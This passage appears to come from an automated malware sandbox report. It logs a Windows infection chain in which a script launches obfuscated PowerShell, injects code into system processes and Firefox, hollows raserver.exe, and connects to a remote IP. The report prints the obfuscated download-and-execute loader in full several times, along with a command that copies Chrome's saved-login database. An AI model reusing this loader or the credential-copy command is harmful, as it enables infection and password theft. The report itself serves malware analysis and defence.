Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 mov eax, dword ptr fs:[00000030h] 20_2_22430770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 mov eax, dword ptr fs:[00000030h] 20_2_22430770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 mov eax, dword ptr fs:[00000030h] 20_2_22430770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 mov eax, dword ptr fs:[00000030h] 20_2_22430770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 mov eax, dword ptr fs:[00000030h] 20_2_22430770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 mov eax, dword ptr fs:[00000030h] 20_2_22430770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22425702 mov eax, dword ptr fs:[00000030h] 20_2_22425702
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22425702 mov eax, dword ptr fs:[00000030h] 20_2_22425702
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22427703 mov eax, dword ptr fs:[00000030h] 20_2_22427703
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245C700 mov eax, dword ptr fs:[00000030h] 20_2_2245C700
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22420710 mov eax, dword ptr fs:[00000030h] 20_2_22420710
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22450710 mov eax, dword ptr fs:[00000030h] 20_2_22450710
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245F71F mov eax, dword ptr fs:[00000030h] 20_2_2245F71F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245F71F mov eax, dword ptr fs:[00000030h] 20_2_2245F71F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22423720 mov eax, dword ptr fs:[00000030h] 20_2_22423720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243F720 mov eax, dword ptr fs:[00000030h] 20_2_2243F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243F720 mov eax, dword ptr fs:[00000030h] 20_2_2243F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243F720 mov eax, dword ptr fs:[00000030h] 20_2_2243F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DF72E mov eax, dword ptr fs:[00000030h] 20_2_224DF72E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245C720 mov eax, dword ptr fs:[00000030h] 20_2_2245C720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245C720 mov eax, dword ptr fs:[00000030h] 20_2_2245C720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E972B mov eax, dword ptr fs:[00000030h] 20_2_224E972B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419730 mov eax, dword ptr fs:[00000030h] 20_2_22419730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419730 mov eax, dword ptr fs:[00000030h] 20_2_22419730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22455734 mov eax, dword ptr fs:[00000030h] 20_2_22455734
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224FB73C mov eax, dword ptr fs:[00000030h] 20_2_224FB73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224FB73C mov eax, dword ptr fs:[00000030h] 20_2_224FB73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224FB73C mov eax, dword ptr fs:[00000030h] 20_2_224FB73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224FB73C mov eax, dword ptr fs:[00000030h] 20_2_224FB73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242973A mov eax, dword ptr fs:[00000030h] 20_2_2242973A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242973A mov eax, dword ptr fs:[00000030h] 20_2_2242973A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245273C mov eax, dword ptr fs:[00000030h] 20_2_2245273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245273C mov ecx, dword ptr fs:[00000030h] 20_2_2245273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245273C mov eax, dword ptr fs:[00000030h] 20_2_2245273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249C730 mov eax, dword ptr fs:[00000030h] 20_2_2249C730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242C7C0 mov eax, dword ptr fs:[00000030h] 20_2_2242C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224257C0 mov eax, dword ptr fs:[00000030h] 20_2_224257C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224257C0 mov eax, dword ptr fs:[00000030h] 20_2_224257C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224257C0 mov eax, dword ptr fs:[00000030h] 20_2_224257C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A07C3 mov eax, dword ptr fs:[00000030h] 20_2_224A07C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242D7E0 mov ecx, dword ptr fs:[00000030h] 20_2_2242D7E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224427ED mov eax, dword ptr fs:[00000030h] 20_2_224427ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224427ED mov eax, dword ptr fs:[00000030h] 20_2_224427ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224427ED mov eax, dword ptr fs:[00000030h] 20_2_224427ED
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8949C GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc, 25_2_00C8949C
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C92000 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 25_2_00C92000
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C926B0 SetUnhandledExceptionFilter, 25_2_00C926B0

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 46.23.69.44 80 Jump to behavior
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_7428.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7748, type: MEMORYSTR
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\raserver.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF722870000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread register set: target process: 4056 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread register set: target process: 4056 Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Thread register set: target process: 4056 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: C80000 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3000000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 70FFD8 Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF722870000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering';if (${host}.currentculture) {$fortrd++;}function jimmis($poria){$jumpily=$poria.length-$fortrd;$anteopercle='substri';$anteopercle+='ng';for( $racialisation=4;$racialisation -lt $jumpily;$racialisation+=5){$fantasibilledernes+=$poria.$anteopercle.invoke( $racialisation, $fortrd);}$fantasibilledernes;}function fluorideringen($uncouthly){ . ($flanconnade) ($uncouthly);}$hoosegow=jimmis 'un.emsklvoflipz ,deir,prlspa lk,nnaalle/or,i5tilb. ,dn0bran sam,(undewcredijo.nnimprdudsno udlw horsbesl aldnbemytprim vas.1neig0 kem.irri0,lde;bl,t .onawre,aipaahn .on6 tre4wagg; arm bru.xk rs6nost4educ; wo. counrklorvb.ot:lysa1regn2fald1xmas. ans0 s.d)elek kroogustiemuhacrestk acoo s.j/came2 p,e0pa.r1sk m0skil0h al1radr0foot1vomi charftovaistikrleveeoverf frdogoloxbrss/unde1majo2 enn1okke.prdi0s,nn ';$neurocanal151=jimmis 'ulyduempessloweilsarq,nd- .laa priginteegleanfishtskin ';$skumredes=jimmis 'brochsp,ktbookt .onpfac,sstri:male/ afa/ carl disarafrrbiocrsvelyb,cof undr angapre,n ungkbree.stancmaybppal.a ,an/heren.bekeu,orgdiamuanoms m t8cons5eoga.s.udcidylshe,lv gra ';$minty=jimmis 'mero>jamr ';$flanconnade=jimmis ' m.lisidee sslx.ype ';$lansquenet='guls';$andejagterne = jimmis 'velkeslaucfl.nhnontohydr l.m%aadsapa.ap subpforsdca iaviv.tmiddap,la%semi\sikkc sidoe,tanrsknctoogordbyrspaddpersaco elohmm6 yd.mounu chedhydasforb am m&gall& st. singemoanct,reh truo ade forbt hyp ';fluorideringen (jimmis 'piep$.lyhgtreblac roantib arbakumeltest: f.lmw.ttykryso ,hapres.lobfuafumishoustswanilaarckons=e,te(havfclsevm litd sv. ok e/r ascmonc ,mmi$da,ea ke niri,dhoddeber j entaax igparatcodaeidenrunpen kiheu.ad)symp ');fluorideringen (jimmis 'bdep$mirkgwea.lpreco sexb uheaeighlvgel:denom unsegodit,ambh ageosk,ldre pi p.ezominirealn a,vgfrdi=anet$blomsbombkslanu re.mtakirna oedeted ratefrolsskri.jords regpevanl .ipiaerotbrne(he e$fornm resiove.nhvidtorobyko i)ba,a ');fluorideringen (jimmis ' er[deernblomek.sttnig,.revescohaeslumrsk.fvpro,ikni c ybetandpfrago ob idetan hu,tarr.mbogbagorengra.anonbghjste ungr raa]afgr:fors: suksunteedevocjantulighrvoksismletcol.ym.toppro rtahio.ourt aflo udvclynto n,tl til scin= bin dis,[br dn deved,litobtu.lubes kaesmugc resu sclrquediinfrtzardy hyapunprrlrdooscout craomalpcmi,io oscloplat ordyneappre aehaak] cuc:sh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering';if (${host}.currentculture) {$fortrd++;}function jimmis($poria){$jumpily=$poria.length-$fortrd;$anteopercle='substri';$anteopercle+='ng';for( $racialisation=4;$racialisation -lt $jumpily;$racialisation+=5){$fantasibilledernes+=$poria.$anteopercle.invoke( $racialisation, $fortrd);}$fantasibilledernes;}function fluorideringen($uncouthly){ . ($flanconnade) ($uncouthly);}$hoosegow=jimmis 'un.emsklvoflipz ,deir,prlspa lk,nnaalle/or,i5tilb. ,dn0bran sam,(undewcredijo.nnimprdudsno udlw horsbesl aldnbemytprim vas.1neig0 kem.irri0,lde;bl,t .onawre,aipaahn .on6 tre4wagg; arm bru.xk rs6nost4educ; wo. counrklorvb.ot:lysa1regn2fald1xmas. ans0 s.d)elek kroogustiemuhacrestk acoo s.j/came2 p,e0pa.r1sk m0skil0h al1radr0foot1vomi charftovaistikrleveeoverf frdogoloxbrss/unde1majo2 enn1okke.prdi0s,nn ';$neurocanal151=jimmis 'ulyduempessloweilsarq,nd- .laa priginteegleanfishtskin ';$skumredes=jimmis 'brochsp,ktbookt .onpfac,sstri:male/ afa/ carl disarafrrbiocrsvelyb,cof undr angapre,n ungkbree.stancmaybppal.a ,an/heren.bekeu,orgdiamuanoms m t8cons5eoga.s.udcidylshe,lv gra ';$minty=jimmis 'mero>jamr ';$flanconnade=jimmis ' m.lisidee sslx.ype ';$lansquenet='guls';$andejagterne = jimmis 'velkeslaucfl.nhnontohydr l.m%aadsapa.ap subpforsdca iaviv.tmiddap,la%semi\sikkc sidoe,tanrsknctoogordbyrspaddpersaco elohmm6 yd.mounu chedhydasforb am m&gall& st. singemoanct,reh truo ade forbt hyp ';fluorideringen (jimmis 'piep$.lyhgtreblac roantib arbakumeltest: f.lmw.ttykryso ,hapres.lobfuafumishoustswanilaarckons=e,te(havfclsevm litd sv. ok e/r ascmonc ,mmi$da,ea ke niri,dhoddeber j entaax igparatcodaeidenrunpen kiheu.ad)symp ');fluorideringen (jimmis 'bdep$mirkgwea.lpreco sexb uheaeighlvgel:denom unsegodit,ambh ageosk,ldre pi p.ezominirealn a,vgfrdi=anet$blomsbombkslanu re.mtakirna oedeted ratefrolsskri.jords regpevanl .ipiaerotbrne(he e$fornm resiove.nhvidtorobyko i)ba,a ');fluorideringen (jimmis ' er[deernblomek.sttnig,.revescohaeslumrsk.fvpro,ikni c ybetandpfrago ob idetan hu,tarr.mbogbagorengra.anonbghjste ungr raa]afgr:fors: suksunteedevocjantulighrvoksismletcol.ym.toppro rtahio.ourt aflo udvclynto n,tl til scin= bin dis,[br dn deved,litobtu.lubes kaesmugc resu sclrquediinfrtzardy hyapunprrlrdooscout craomalpcmi,io oscloplat ordyneappre aehaak] cuc:sh
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering';if (${host}.currentculture) {$fortrd++;}function jimmis($poria){$jumpily=$poria.length-$fortrd;$anteopercle='substri';$anteopercle+='ng';for( $racialisation=4;$racialisation -lt $jumpily;$racialisation+=5){$fantasibilledernes+=$poria.$anteopercle.invoke( $racialisation, $fortrd);}$fantasibilledernes;}function fluorideringen($uncouthly){ . ($flanconnade) ($uncouthly);}$hoosegow=jimmis 'un.emsklvoflipz ,deir,prlspa lk,nnaalle/or,i5tilb. ,dn0bran sam,(undewcredijo.nnimprdudsno udlw horsbesl aldnbemytprim vas.1neig0 kem.irri0,lde;bl,t .onawre,aipaahn .on6 tre4wagg; arm bru.xk rs6nost4educ; wo. counrklorvb.ot:lysa1regn2fald1xmas. ans0 s.d)elek kroogustiemuhacrestk acoo s.j/came2 p,e0pa.r1sk m0skil0h al1radr0foot1vomi charftovaistikrleveeoverf frdogoloxbrss/unde1majo2 enn1okke.prdi0s,nn ';$neurocanal151=jimmis 'ulyduempessloweilsarq,nd- .laa priginteegleanfishtskin ';$skumredes=jimmis 'brochsp,ktbookt .onpfac,sstri:male/ afa/ carl disarafrrbiocrsvelyb,cof undr angapre,n ungkbree.stancmaybppal.a ,an/heren.bekeu,orgdiamuanoms m t8cons5eoga.s.udcidylshe,lv gra ';$minty=jimmis 'mero>jamr ';$flanconnade=jimmis ' m.lisidee sslx.ype ';$lansquenet='guls';$andejagterne = jimmis 'velkeslaucfl.nhnontohydr l.m%aadsapa.ap subpforsdca iaviv.tmiddap,la%semi\sikkc sidoe,tanrsknctoogordbyrspaddpersaco elohmm6 yd.mounu chedhydasforb am m&gall& st. singemoanct,reh truo ade forbt hyp ';fluorideringen (jimmis 'piep$.lyhgtreblac roantib arbakumeltest: f.lmw.ttykryso ,hapres.lobfuafumishoustswanilaarckons=e,te(havfclsevm litd sv. ok e/r ascmonc ,mmi$da,ea ke niri,dhoddeber j entaax igparatcodaeidenrunpen kiheu.ad)symp ');fluorideringen (jimmis 'bdep$mirkgwea.lpreco sexb uheaeighlvgel:denom unsegodit,ambh ageosk,ldre pi p.ezominirealn a,vgfrdi=anet$blomsbombkslanu re.mtakirna oedeted ratefrolsskri.jords regpevanl .ipiaerotbrne(he e$fornm resiove.nhvidtorobyko i)ba,a ');fluorideringen (jimmis ' er[deernblomek.sttnig,.revescohaeslumrsk.fvpro,ikni c ybetandpfrago ob idetan hu,tarr.mbogbagorengra.anonbghjste ungr raa]afgr:fors: suksunteedevocjantulighrvoksismletcol.ym.toppro rtahio.ourt aflo udvclynto n,tl til scin= bin dis,[br dn deved,litobtu.lubes kaesmugc resu sclrquediinfrtzardy hyapunprrlrdooscout craomalpcmi,io oscloplat ordyneappre aehaak] cuc:sh Jump to behavior
